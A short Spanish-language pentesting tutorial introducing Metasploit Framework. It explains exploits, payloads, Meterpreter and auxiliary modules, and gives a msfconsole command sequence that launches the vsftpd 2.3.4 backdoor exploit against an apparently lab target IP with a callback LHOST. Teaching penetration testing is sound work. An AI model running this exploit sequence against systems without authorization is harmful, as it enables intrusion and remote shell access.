Metasploit Framework es la plataforma de explotación más usada en pentesting. Reúne cientos de exploits, payloads y herramientas auxiliares bajo una misma consola (
msfconsole), con una forma de uso común para todos los módulos.
Su valor es la estandarización: en lugar de adaptar cada exploit a mano, se seleccionan módulos ya integrados, se configuran unas pocas opciones y se lanzan.
Conceptos clave
- Exploit → módulo que aprovecha una vulnerabilidad específica.
- Payload → código que se ejecuta en la víctima tras la explotación (ej. abrir una shell).
- Meterpreter → payload avanzado que da una sesión con muchas funciones (subir/bajar archivos, capturar pantalla, escalar, pivotar).
- Opciones → parámetros a configurar, como
RHOSTS(objetivo) yLHOST(tu IP). - Auxiliary → módulos que no explotan, sino que escanean, enumeran o hacen fuzzing.
Flujo de trabajo básico
msfconsole # abrir la consola
search vsftpd # buscar un módulo
use exploit/unix/ftp/vsftpd_234_backdoor # seleccionarlo
show options # ver qué hay que configurar
set RHOSTS 10.10.10.10 # configurar el objetivo
set LHOST 10.10.14.5 # configurar tu IP (para el payload)
exploit # lanzar (o 'run')
El ciclo search → use → show options → set → exploit se repite para casi cualquier módulo.
| Componente | Para qué sirve |
|---|---|
exploit/ | Aprovechar una vulnerabilidad |
payload/ | Qué se ejecuta tras entrar |
auxiliary/ | Escanear, enumerar, fuzzear |
post/ | Acciones de post-explotación |
Metasploit resuelve mucho, pero no toda intrusión empieza con un exploit: muchas veces la puerta es una credencial débil. Romper contraseñas con fuerza bruta y diccionarios es el próximo tema (Hydra y Hashcat).